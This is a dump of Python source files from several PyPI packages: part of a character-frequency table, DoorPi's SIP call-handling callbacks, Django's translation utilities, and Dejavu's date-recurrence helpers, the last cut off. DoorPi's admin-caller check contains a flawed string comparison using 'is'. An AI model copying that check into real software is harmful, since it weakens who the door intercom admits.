7645,4586,2902,7646,7647,3227,5022,7648,4587,7649,4284,7650,7651,7652,4588,2284, # 7488
7653,5023,7654,7655,7656,4589,5024,3802,7657,7658,5025,3508,4590,7659,7660,7661, # 7504
1969,5026,7662,7663,3684,1821,2688,7664,2028,2509,4285,7665,2823,1841,7666,2689, # 7520
3114,7667,3917,4085,2160,5027,5028,2972,7668,5029,7669,7670,7671,3593,4086,7672, # 7536
4591,4087,5030,3803,7673,7674,7675,7676,7677,7678,7679,4286,2366,4592,4593,3067, # 7552
2328,7680,7681,4594,3594,3918,2029,4287,7682,5031,3919,3370,4288,4595,2856,7683, # 7568
3509,7684,7685,5032,5033,7686,7687,3804,2784,7688,7689,7690,7691,3371,7692,7693, # 7584
2877,5034,7694,7695,3920,4289,4088,7696,7697,7698,5035,7699,5036,4290,5037,5038, # 7600
5039,7700,7701,7702,5040,5041,3228,7703,1760,7704,5042,3229,4596,2106,4089,7705, # 7616
4597,2824,5043,2107,3372,7706,4291,4090,5044,7707,4091,7708,5045,3025,3805,4598, # 7632
4292,4293,4294,3373,7709,4599,7710,5046,7711,7712,5047,5048,3806,7713,7714,7715, # 7648
5049,7716,7717,7718,7719,4600,5050,7720,7721,7722,5051,7723,4295,3429,7724,7725, # 7664
7726,7727,3921,7728,3292,5052,4092,7729,7730,7731,7732,7733,7734,7735,5053,5054, # 7680
7736,7737,7738,7739,3922,3685,7740,7741,7742,7743,2635,5055,7744,5056,4601,7745, # 7696
7746,2560,7747,7748,7749,7750,3923,7751,7752,7753,7754,7755,4296,2903,7756,7757, # 7712
7758,7759,7760,3924,7761,5057,4297,7762,7763,5058,4298,7764,4093,7765,7766,5059, # 7728
3925,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,3595,7777,4299,5060,4094, # 7744
7778,3293,5061,7779,7780,4300,7781,7782,4602,7783,3596,7784,7785,3430,2367,7786, # 7760
3164,5062,5063,4301,7787,7788,4095,5064,5065,7789,3374,3115,7790,7791,7792,7793, # 7776
7794,7795,7796,3597,4603,7797,7798,3686,3116,3807,5066,7799,7800,5067,7801,7802, # 7792
4604,4302,5068,4303,4096,7803,7804,3294,7805,7806,5069,4605,2690,7807,3026,7808, # 7808
7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824, # 7824
7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7840
7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,7856, # 7856
7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,7872, # 7872
7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,7888, # 7888
7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,7904, # 7904
7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,7920, # 7920
7921,7922,7923,7924,3926,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935, # 7936
7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951, # 7952
7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967, # 7968
7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983, # 7984
7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999, # 8000
8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015, # 8016
8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031, # 8032
8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047, # 8048
8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063, # 8064
8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079, # 8080
8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095, # 8096
8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111, # 8112
8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127, # 8128
8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143, # 8144
8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159, # 8160
8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175, # 8176
8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191, # 8192
8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207, # 8208
8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223, # 8224
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272
# flake8: noqa | PypiClean |
/DoorPi-2.4.1.8.tar.gz/DoorPi-2.4.1.8/doorpi/sipphone/linphone_lib/CallBacks.py |
import logging
logger = logging.getLogger(__name__)
logger.debug("%s loaded", __name__)
from time import sleep
import linphone
from doorpi import DoorPi
class LinphoneCallbacks:
@property
def used_callbacks(self): return {
#http://www.linphone.org/docs/liblinphone/struct__LinphoneCoreVTable.html
#'global_state_changed': self.global_state_changed, #Notifies global state changes
#'registration_state_changed': self.registration_state_changed, #Notifies registration state changes
'call_state_changed': self.call_state_changed, #Notifies call state changes
#'notify_presence_received': self.notify_presence_received, #Notify received presence events
#'new_subscription_requested': self.new_subscription_requested, #Notify about pending presence subscription request
#'auth_info_requested': self.auth_info_requested, #Ask the application some authentication information
#'call_log_updated': self.call_log_updated, #Notifies that call log list has been updated
#'message_received': self.message_received, #a message is received, can be text or external body
#'is_composing_received': self.is_composing_received, #An is-composing notification has been received
        'dtmf_received': self.dtmf_received, #A DTMF tone has been received
#'refer_received': self.refer_received, #An out of call refer was received
#'call_encryption_changed': self.call_encryption_changed, #Notifies on change in the encryption of call streams
#'transfer_state_changed': self.transfer_state_changed, #Notifies when a transfer is in progress
#'buddy_info_updated': self.buddy_info_updated, #a LinphoneFriend's BuddyInfo has changed
#'call_stats_updated': self.call_stats_updated, #Notifies on refreshing of call's statistics.
#'info_received': self.info_received, #Notifies an incoming informational message received.
#'subscription_state_changed': self.subscription_state_changed, #Notifies subscription state change
        #'notify_received': self.notify_received, #Notifies an event notification, see linphone_core_subscribe()
        #'configuring_status': self.configuring_status, #Notifies configuring (remote provisioning) status changes
        #'network_reachable': self.network_reachable, #Callback to report IP network status (i.e. up/down)
#'log_collection_upload_state_changed': self.log_collection_upload_state_changed, #Callback to upload collected logs
#'log_collection_upload_progress_indication': self.log_collection_upload_progress_indication #Callback to indicate log collection upload progress
}
@property
def whitelist(self): return DoorPi().config.get_keys('AdminNumbers')
def is_admin_number(self, remote_uri):
logger.debug("is_admin_number (%s)",remote_uri)
for admin_number in self.whitelist:
if "sip:"+admin_number+"@" in remote_uri:
logger.debug("%s is adminnumber %s", remote_uri, admin_number)
return True
if "sip:"+admin_number is remote_uri:
logger.debug("%s is adminnumber %s", remote_uri, admin_number)
return True
logger.debug("%s is not an adminnumber", remote_uri)
return False
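    # Illustrative example (a sketch, not part of the original module): with
    # an AdminNumbers config entry of "100", the checks above behave like:
    #   is_admin_number("sip:100@192.168.1.2")  -> True  (prefix + "@" match)
    #   is_admin_number("sip:101@192.168.1.2")  -> False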
__DTMF = ''
__possible_DTMF = []
def __init__(self):
logger.debug("__init__")
self._last_number_of_calls = 0
DoorPi().event_handler.register_action('OnSipPhoneDestroy', self.destroy)
DoorPi().event_handler.register_event('OnCallMediaStateChange', __name__)
DoorPi().event_handler.register_event('OnMediaRequired', __name__)
DoorPi().event_handler.register_event('OnMediaNotRequired', __name__)
DoorPi().event_handler.register_event('OnCallStateChange', __name__)
DoorPi().event_handler.register_event('OnCallStateConnect', __name__)
DoorPi().event_handler.register_event('AfterCallStateConnect', __name__)
DoorPi().event_handler.register_event('OnCallStateDisconnect', __name__)
DoorPi().event_handler.register_event('AfterCallStateDisconnect', __name__)
DoorPi().event_handler.register_event('OnCallStateDismissed', __name__)
DoorPi().event_handler.register_event('OnCallStateReject', __name__)
DoorPi().event_handler.register_event('OnCallStart', __name__)
DoorPi().event_handler.register_event('OnDTMF', __name__)
self.__possible_DTMF = DoorPi().config.get_keys('DTMF')
for DTMF in self.__possible_DTMF:
DoorPi().event_handler.register_event('OnDTMF_'+DTMF, __name__)
DoorPi().event_handler.register_event('OnCallStart', __name__)
DoorPi().event_handler.register_event('BeforeCallIncoming', __name__)
DoorPi().event_handler.register_event('OnCallReconnect', __name__)
DoorPi().event_handler.register_event('AfterCallReconnect', __name__)
DoorPi().event_handler.register_event('OnCallBusy', __name__)
DoorPi().event_handler.register_event('AfterCallBusy', __name__)
DoorPi().event_handler.register_event('OnCallIncoming', __name__)
DoorPi().event_handler.register_event('AfterCallIncoming', __name__)
DoorPi().event_handler.register_event('OnCallReject', __name__)
DoorPi().event_handler.register_event('AfterCallReject', __name__)
#DoorPi().event_handler.register_event('AfterAccountRegState', __name__)
DoorPi().event_handler('OnCallStart', __name__)
def destroy(self):
logger.debug("destroy")
DoorPi().event_handler.unregister_source(__name__, True)
def global_state_changed(self, core, global_state, message): pass
def registration_state_changed(self, core, linphone_proxy_config, state, message): pass
def call_state_changed(self, core, call, call_state, message):
self.call_state_changed_handle(core, call, call_state, message)
if core.calls_nb > 0 and self._last_number_of_calls == 0:
DoorPi().event_handler('OnMediaRequired', __name__)
        elif self._last_number_of_calls != core.calls_nb:
DoorPi().event_handler('OnMediaNotRequired', __name__)
self._last_number_of_calls = core.calls_nb
def call_state_changed_handle(self, core, call, call_state, message):
logger.debug("call_state_changed (%s - %s)", call_state, message)
remote_uri = call.remote_address.as_string_uri_only()
DoorPi().event_handler('OnCallStateChange', __name__, {
'remote_uri': remote_uri,
'call_state': call_state,
'state': message
})
if call_state == linphone.CallState.Idle:
pass
elif call_state == linphone.CallState.IncomingReceived:
DoorPi().event_handler('BeforeCallIncoming', __name__, {'remote_uri': remote_uri})
if core.current_call and core.current_call.state > linphone.CallState.IncomingReceived:
logger.debug("Incoming call while another call is active")
logger.debug("- incoming.remote_uri: %s", call)
logger.debug("- current.remote_uri : %s", core.current_call)
if core.current_call.remote_address.as_string_uri_only() == remote_uri:
logger.info("Current call is incoming call - quitting current and connecting to incoming. Maybe connection reset?")
DoorPi().event_handler('OnCallReconnect', __name__, {'remote_uri': remote_uri})
core.terminate_call(core.current_call)
DoorPi().sipphone.reset_call_start_datetime()
core.accept_call_with_params(call, DoorPi().sipphone.base_config)
DoorPi().event_handler('AfterCallReconnect', __name__)
return
else:
if self.is_admin_number(remote_uri):
logger.info("Incoming and current call are different - incoming is AdminNumber, so hanging up current call")
DoorPi().event_handler('OnCallIncoming', __name__, {'remote_uri': remote_uri})
core.terminate_call(core.current_call)
DoorPi().sipphone.reset_call_start_datetime()
core.accept_call_with_params(call, DoorPi().sipphone.base_config)
DoorPi().event_handler('AfterCallIncoming', __name__, {'remote_uri': remote_uri})
return
else:
logger.info("Incoming and current call are different - sending busy signal to incoming call")
DoorPi().event_handler('OnCallBusy', __name__, {'remote_uri': remote_uri})
core.decline_call(call, linphone.Reason.Busy)
DoorPi().event_handler('AfterCallBusy', __name__)
return
if self.is_admin_number(remote_uri):
DoorPi().event_handler('OnCallIncoming', __name__, {'remote_uri': remote_uri})
DoorPi().sipphone.reset_call_start_datetime()
core.accept_call_with_params(call, DoorPi().sipphone.base_config)
DoorPi().event_handler('AfterCallIncoming', __name__, {'remote_uri': remote_uri})
return
else:
DoorPi().event_handler('OnCallReject', __name__)
core.decline_call(call, linphone.Reason.Forbidden) #Declined
DoorPi().event_handler('AfterCallReject', __name__)
return
elif call_state == linphone.CallState.OutgoingInit:
pass
elif call_state == linphone.CallState.OutgoingProgress:
pass
elif call_state == linphone.CallState.OutgoingRinging:
pass
elif call_state == linphone.CallState.OutgoingEarlyMedia:
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Connected:
DoorPi().event_handler('OnCallStateConnect', __name__)
elif call_state == linphone.CallState.StreamsRunning:
DoorPi().event_handler('AfterCallStateConnect', __name__)
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Pausing:
pass
elif call_state == linphone.CallState.Paused:
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Resuming:
DoorPi().event_handler('OnCallStateConnect', __name__)
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Refered:
pass
elif call_state == linphone.CallState.Error:
if message == "Busy here": DoorPi().event_handler('OnCallStateDismissed', __name__)
elif call_state == linphone.CallState.End:
if message == "Call declined.": DoorPi().event_handler('OnCallStateReject', __name__)
DoorPi().event_handler('OnCallStateDisconnect', __name__)
elif call_state == linphone.CallState.PausedByRemote:
pass
elif call_state == linphone.CallState.UpdatedByRemote:
pass
elif call_state == linphone.CallState.IncomingEarlyMedia:
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Updating:
DoorPi().event_handler('OnCallStateConnect', __name__)
DoorPi().event_handler('OnCallMediaStateChange', __name__)
elif call_state == linphone.CallState.Released:
pass
elif call_state == linphone.CallState.EarlyUpdatedByRemote:
pass
elif call_state == linphone.CallState.EarlyUpdating:
pass
def notify_presence_received(self, core, linphone_friend): pass
def new_subscription_requested(self, core, linphone_friend, url): pass
def auth_info_requested(self, core, realm, username): pass
def call_log_updated(self, core, new_call_log_entry): pass
def message_received(self, core, linphone_chat_room, message): pass
def is_composing_received(self, core, linphone_chat_room): pass
def dtmf_received(self, core, call, digits):
logger.debug("on_dtmf_digit (%s)", str(digits))
digits = chr(digits)
DoorPi().event_handler('OnDTMF', __name__, {'digits':digits})
self.__DTMF += str(digits)
for DTMF in self.__possible_DTMF:
if self.__DTMF.endswith(DTMF[1:-1]):
DoorPi().event_handler('OnDTMF_'+DTMF+'', __name__, {
'remote_uri': str(call.remote_address.as_string_uri_only()),
'DTMF': str(self.__DTMF)
})
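    # Illustrative note (an assumption about DoorPi's config conventions, not
    # confirmed by this module alone): keys in the [DTMF] config section are
    # stored with surrounding quote characters, e.g. "'#'", which is why the
    # DTMF[1:-1] slice above strips the first and last characters before the
    # endswith() match; pressing '#' would then fire the event "OnDTMF_'#'".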
def refer_received(self, core, refer_to): pass
def call_encryption_changed(self, core, call, on, authentication_token): pass
def transfer_state_changed(self, core, call, transfer_state): pass
def buddy_info_updated(self, core, linphone_friend): pass
def call_stats_updated(self, core, call, stats): pass
def info_received(self, core, call, message): pass
def subscription_state_changed(self, core, linphone_event, linphone_subscription_state): pass
def notify_received(self, core, linphone_event, linphone_subscription_state, linphone_body): pass
def configuring_status(self, core, linphone_configuring_state, message): pass
def network_reachable(self, core, reachable): pass
def log_collection_upload_state_changed(self, core, linphone_core_log_collection_upload_state, info): pass
def log_collection_upload_progress_indication(self, core, offset, total): pass
__del__ = destroy | PypiClean |
/Django-4.2.4.tar.gz/Django-4.2.4/django/utils/translation/__init__.py | from contextlib import ContextDecorator
from decimal import ROUND_UP, Decimal
from django.utils.autoreload import autoreload_started, file_changed
from django.utils.functional import lazy
from django.utils.regex_helper import _lazy_re_compile
__all__ = [
"activate",
"deactivate",
"override",
"deactivate_all",
"get_language",
"get_language_from_request",
"get_language_info",
"get_language_bidi",
"check_for_language",
"to_language",
"to_locale",
"templatize",
"gettext",
"gettext_lazy",
"gettext_noop",
"ngettext",
"ngettext_lazy",
"pgettext",
"pgettext_lazy",
"npgettext",
"npgettext_lazy",
]
class TranslatorCommentWarning(SyntaxWarning):
pass
# Here be dragons, so a short explanation of the logic won't hurt:
# We are trying to solve two problems: (1) access settings, in particular
# settings.USE_I18N, as late as possible, so that modules can be imported
# without having to first configure Django, and (2) if some other code creates
# a reference to one of these functions, don't break that reference when we
# replace the functions with their real counterparts (once we do access the
# settings).
class Trans:
"""
The purpose of this class is to store the actual translation function upon
receiving the first call to that function. After this is done, changes to
USE_I18N will have no effect to which function is served upon request. If
your tests rely on changing USE_I18N, you can delete all the functions
from _trans.__dict__.
Note that storing the function with setattr will have a noticeable
performance effect, as access to the function goes the normal path,
instead of using __getattr__.
"""
def __getattr__(self, real_name):
from django.conf import settings
if settings.USE_I18N:
from django.utils.translation import trans_real as trans
from django.utils.translation.reloader import (
translation_file_changed,
watch_for_translation_changes,
)
autoreload_started.connect(
watch_for_translation_changes, dispatch_uid="translation_file_changed"
)
file_changed.connect(
translation_file_changed, dispatch_uid="translation_file_changed"
)
else:
from django.utils.translation import trans_null as trans
setattr(self, real_name, getattr(trans, real_name))
return getattr(trans, real_name)
_trans = Trans()
# The Trans class is no more needed, so remove it from the namespace.
del Trans
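# Illustrative note (a sketch, not part of the module): because the functions
# below always delegate through the module-level _trans proxy, references
# captured before Django is configured keep working once settings exist:
#
#   from django.utils.translation import gettext  # safe at import time
#   gettext("Hello")  # resolves to trans_real or trans_null on first call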
def gettext_noop(message):
return _trans.gettext_noop(message)
def gettext(message):
return _trans.gettext(message)
def ngettext(singular, plural, number):
return _trans.ngettext(singular, plural, number)
def pgettext(context, message):
return _trans.pgettext(context, message)
def npgettext(context, singular, plural, number):
return _trans.npgettext(context, singular, plural, number)
gettext_lazy = lazy(gettext, str)
pgettext_lazy = lazy(pgettext, str)
def lazy_number(func, resultclass, number=None, **kwargs):
if isinstance(number, int):
kwargs["number"] = number
proxy = lazy(func, resultclass)(**kwargs)
else:
original_kwargs = kwargs.copy()
class NumberAwareString(resultclass):
def __bool__(self):
return bool(kwargs["singular"])
def _get_number_value(self, values):
try:
return values[number]
except KeyError:
raise KeyError(
"Your dictionary lacks key '%s'. Please provide "
"it, because it is required to determine whether "
"string is singular or plural." % number
)
def _translate(self, number_value):
kwargs["number"] = number_value
return func(**kwargs)
def format(self, *args, **kwargs):
number_value = (
self._get_number_value(kwargs) if kwargs and number else args[0]
)
return self._translate(number_value).format(*args, **kwargs)
def __mod__(self, rhs):
if isinstance(rhs, dict) and number:
number_value = self._get_number_value(rhs)
else:
number_value = rhs
translated = self._translate(number_value)
try:
translated %= rhs
except TypeError:
# String doesn't contain a placeholder for the number.
pass
return translated
proxy = lazy(lambda **kwargs: NumberAwareString(), NumberAwareString)(**kwargs)
proxy.__reduce__ = lambda: (
_lazy_number_unpickle,
(func, resultclass, number, original_kwargs),
)
return proxy
def _lazy_number_unpickle(func, resultclass, number, kwargs):
return lazy_number(func, resultclass, number=number, **kwargs)
def ngettext_lazy(singular, plural, number=None):
return lazy_number(ngettext, str, singular=singular, plural=plural, number=number)
def npgettext_lazy(context, singular, plural, number=None):
return lazy_number(
npgettext, str, context=context, singular=singular, plural=plural, number=number
)
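# Illustrative usage (a sketch; the key name "count" is an arbitrary example):
# ngettext_lazy defers the singular/plural choice until interpolation time.
#
#   page_count = ngettext_lazy("%(count)d page", "%(count)d pages", "count")
#   page_count % {"count": 2}  # -> "2 pages" under the active translation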
def activate(language):
return _trans.activate(language)
def deactivate():
return _trans.deactivate()
class override(ContextDecorator):
def __init__(self, language, deactivate=False):
self.language = language
self.deactivate = deactivate
def __enter__(self):
self.old_language = get_language()
if self.language is not None:
activate(self.language)
else:
deactivate_all()
def __exit__(self, exc_type, exc_value, traceback):
if self.old_language is None:
deactivate_all()
elif self.deactivate:
deactivate()
else:
activate(self.old_language)
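# Illustrative usage (a sketch): `override` acts as a context manager or
# decorator that activates a language and restores the previous one on exit:
#
#   with override("de"):
#       ...  # gettext() calls here use the "de" catalog, if available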
def get_language():
return _trans.get_language()
def get_language_bidi():
return _trans.get_language_bidi()
def check_for_language(lang_code):
return _trans.check_for_language(lang_code)
def to_language(locale):
"""Turn a locale name (en_US) into a language name (en-us)."""
p = locale.find("_")
if p >= 0:
return locale[:p].lower() + "-" + locale[p + 1 :].lower()
else:
return locale.lower()
def to_locale(language):
"""Turn a language name (en-us) into a locale name (en_US)."""
lang, _, country = language.lower().partition("-")
if not country:
return language[:3].lower() + language[3:]
# A language with > 2 characters after the dash only has its first
# character after the dash capitalized; e.g. sr-latn becomes sr_Latn.
# A language with 2 characters after the dash has both characters
# capitalized; e.g. en-us becomes en_US.
country, _, tail = country.partition("-")
country = country.title() if len(country) > 2 else country.upper()
if tail:
country += "-" + tail
return lang + "_" + country
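# Illustrative examples (a sketch mirroring the docstrings above):
#
#   to_language("en_US")  # -> "en-us"
#   to_locale("en-us")    # -> "en_US"
#   to_locale("sr-latn")  # -> "sr_Latn"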
def get_language_from_request(request, check_path=False):
return _trans.get_language_from_request(request, check_path)
def get_language_from_path(path):
return _trans.get_language_from_path(path)
def get_supported_language_variant(lang_code, *, strict=False):
return _trans.get_supported_language_variant(lang_code, strict)
def templatize(src, **kwargs):
from .template import templatize
return templatize(src, **kwargs)
def deactivate_all():
return _trans.deactivate_all()
def get_language_info(lang_code):
from django.conf.locale import LANG_INFO
try:
lang_info = LANG_INFO[lang_code]
if "fallback" in lang_info and "name" not in lang_info:
info = get_language_info(lang_info["fallback"][0])
else:
info = lang_info
except KeyError:
if "-" not in lang_code:
raise KeyError("Unknown language code %s." % lang_code)
generic_lang_code = lang_code.split("-")[0]
try:
info = LANG_INFO[generic_lang_code]
except KeyError:
raise KeyError(
"Unknown language code %s and %s." % (lang_code, generic_lang_code)
)
if info:
info["name_translated"] = gettext_lazy(info["name"])
return info
trim_whitespace_re = _lazy_re_compile(r"\s*\n\s*")
def trim_whitespace(s):
return trim_whitespace_re.sub(" ", s.strip())
def round_away_from_one(value):
return int(Decimal(value - 1).quantize(Decimal("0"), rounding=ROUND_UP)) + 1 | PypiClean |
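# Illustrative examples (a sketch): the result is rounded away from 1, e.g.
#
#   round_away_from_one(1.5)  # -> 2
#   round_away_from_one(0.5)  # -> 0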
/Dejavu-1.5.0.zip/Dejavu-1.5.0/dejavu/recur.py | import datetime
import re
import threading
def sane_date(year, month, day, highzero=False):
"""Return a valid datetime.date even if parameters are out of bounds.
If the month param is out of bounds, both it and the year will be
modified relative to the first month of the given year.
If the day param is out of bounds, the day, month, and possibly year
will be modified. If the day param is zero or negative, then the
"zeroth day" of the given month is assumed to be the last day of the
previous month, unless highzero is True, in which case the "zeroth day"
is the last day of the given month.
Examples:
sane_date(2003, 2, 1) = datetime.date(2003, 2, 1)
sane_date(2003, -10, 13) = datetime.date(2002, 2, 13)
sane_date(2003, 12, -5) = datetime.date(2003, 11, 25)
sane_date(2003, 12, -5, highzero=True) = datetime.date(2003, 12, 26)
"""
while month > 12:
month -= 12
year += 1
while month < 1:
month += 12
year -= 1
if highzero and day < 1:
# Count backward from the first of *next* month.
firstOfMonth = sane_date(year, month + 1, 1)
else:
# Count backward/forward from the first of the current month.
firstOfMonth = datetime.date(year, month, 1)
newDate = firstOfMonth + datetime.timedelta(day - 1)
return newDate
def sane_time(day, hour, minute, second):
"""Return a valid (day, datetime.time) even if parameters are out of bounds.
If the hour param is out of bounds, both it and the day will
be modified. If negative, the day will be decremented.
If the minute param is out of bounds, both it and the hour will
be modified. If negative, the hour will be decremented.
If the second param is out of bounds, both it and the minute will
be modified. If negative, the minute will be decremented.
Examples:
        sane_time(0, 4, 2, 1) = (0, datetime.time(4, 2, 1))
        sane_time(0, 25, 2, 1) = (1, datetime.time(1, 2, 1))
        sane_time(0, 4, 1440, 1) = (1, datetime.time(4, 0, 1))
        sane_time(0, 0, 0, -1) = (-1, datetime.time(23, 59, 59))
"""
while second > 59:
second -= 60
minute += 1
while second < 0:
second += 60
minute -= 1
while minute > 59:
minute -= 60
hour += 1
while minute < 0:
minute += 60
hour -= 1
while hour > 23:
hour -= 24
day += 1
while hour < 0:
hour += 24
day -= 1
newTime = (day, datetime.time(hour, minute, second))
return newTime
def seconds(startDate, frequency=1, endDate=None):
"""Yield a sequence of datetimes, adding 'frequency' seconds each time.
For example:
seconds(datetime.datetime(2004, 5, 4, 14, 0), 6)
yields the sequence: 2004-05-04 14:00:00, 2004-05-04 14:00:06,
2004-05-04 14:00:12, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
For example:
        seconds(datetime.date(2004, 5, 4), 15, datetime.date(2004, 5, 5))
yields the sequence: 2004-05-04 00:00:00, 2004-05-04 00:00:15,
2004-05-04 00:00:30, ...
... 2004-05-05 23:59:15,
2004-05-05 23:59:30, 2004-05-05 23:59:45.
"""
    if not hasattr(startDate, u'time'):
        startDate = datetime.datetime.combine(startDate, datetime.time(0))
    # Coerce a date-only endDate to the last moment of that day,
    # as the docstring promises (and as hours() below already does).
    if endDate is not None and not hasattr(endDate, u'time'):
        endDate = datetime.datetime.combine(endDate, datetime.time(23, 59, 59))
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(seconds=frequency)
def eachminute(startDate, seconds=0, endDate=None):
"""Yield the same time for each minute. Defaults to 0 seconds.
Yielded values are datetime.datetime objects.
For example:
        eachminute(datetime.datetime(2004, 5, 4, 23, 55), 15)
yields the sequence: 2004-05-04 23:55:15, 2004-05-04 23:56:15,
2004-05-04 23:57:15, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be the first valid time after
midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
"""
seconds = int(seconds)
if hasattr(startDate, u'time'):
days, zerotime = sane_time(0, startDate.hour,
startDate.minute, seconds)
if days < 0 or zerotime < startDate.time():
days, zerotime = sane_time(0, startDate.hour,
startDate.minute + 1, seconds)
else:
days, zerotime = sane_time(0, 0, 0, seconds)
startDate = sane_date(startDate.year, startDate.month,
startDate.day + days)
    startDate = datetime.datetime.combine(startDate, zerotime)
    # Coerce a date-only endDate to the last moment of that day,
    # as the docstring promises.
    if endDate is not None and not hasattr(endDate, u'time'):
        endDate = datetime.datetime.combine(endDate, datetime.time(23, 59, 59))
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(minutes=1)
def minutes(startDate, frequency=1, endDate=None):
"""Yield a sequence of datetimes, adding 'frequency' minutes each time.
For example:
minutes(datetime.datetime(2004, 5, 4, 14), 30)
yields the sequence: 2004-05-04 14:00:00, 2004-05-04 14:30:00,
2004-05-04 15:00:00, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
For example:
        minutes(datetime.date(2004, 5, 4), 15, datetime.date(2004, 5, 5))
yields the sequence: 2004-05-04 00:00:00, 2004-05-04 00:15:00,
2004-05-04 00:30:00, ...
... 2004-05-05 23:15:00,
2004-05-05 23:30:00, 2004-05-05 23:45:00.
"""
    if not hasattr(startDate, u'time'):
        startDate = datetime.datetime.combine(startDate, datetime.time(0))
    # Coerce a date-only endDate to the last moment of that day,
    # as the docstring promises.
    if endDate is not None and not hasattr(endDate, u'time'):
        endDate = datetime.datetime.combine(endDate, datetime.time(23, 59, 59))
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(minutes=frequency)
def eachhour(startDate, minutes=0, seconds=0, endDate=None):
"""Yield the same time for each hour. Defaults to 00:00.
Yielded values are datetime.datetime objects.
For example:
        eachhour(datetime.datetime(2004, 5, 4, 6), 15)
yields the sequence: 2004-05-04 06:15:00, 2004-05-04 07:15:00,
2004-05-04 08:15:00, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be the first valid time after
midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
"""
minutes = int(minutes)
seconds = int(seconds)
if hasattr(startDate, u'time'):
zerotime = datetime.time(startDate.hour, minutes, seconds)
if zerotime < startDate.time():
if zerotime.hour < 23:
zerotime = datetime.time(zerotime.hour + 1, minutes, seconds)
else:
zerotime = datetime.time(0, minutes, seconds)
startDate = sane_date(startDate.year, startDate.month,
startDate.day + 1)
else:
zerotime = datetime.time(0, minutes, seconds)
    startDate = datetime.datetime.combine(startDate, zerotime)
    if endDate and not hasattr(endDate, u'time'):
        # A bare date as endDate means "up to the end of that day".
        endDate = datetime.datetime.combine(endDate, datetime.time(23, 59, 59))
    while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(hours=1)
def hours(startDate, frequency=1, endDate=None):
"""Yield a sequence of datetimes, adding 'frequency' hours each time.
For example:
hours(datetime.datetime(2004, 5, 4, 14), 6)
yields the sequence: 2004-05-04 14:00:00, 2004-05-04 20:00:00,
2004-05-05 2:00:00, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
For example:
        hours(datetime.datetime(2004, 5, 4), 8, datetime.date(2004, 5, 5))
yields the sequence: 2004-05-04 00:00:00, 2004-05-04 08:00:00,
2004-05-04 16:00:00, 2004-05-05 00:00:00,
2004-05-05 08:00:00, 2004-05-05 16:00:00.
"""
if not hasattr(startDate, "time"):
startDate = datetime.datetime.combine(startDate, datetime.time(0))
if endDate and not hasattr(endDate, "time"):
endDate = datetime.datetime.combine(endDate, datetime.time(23, 59, 59))
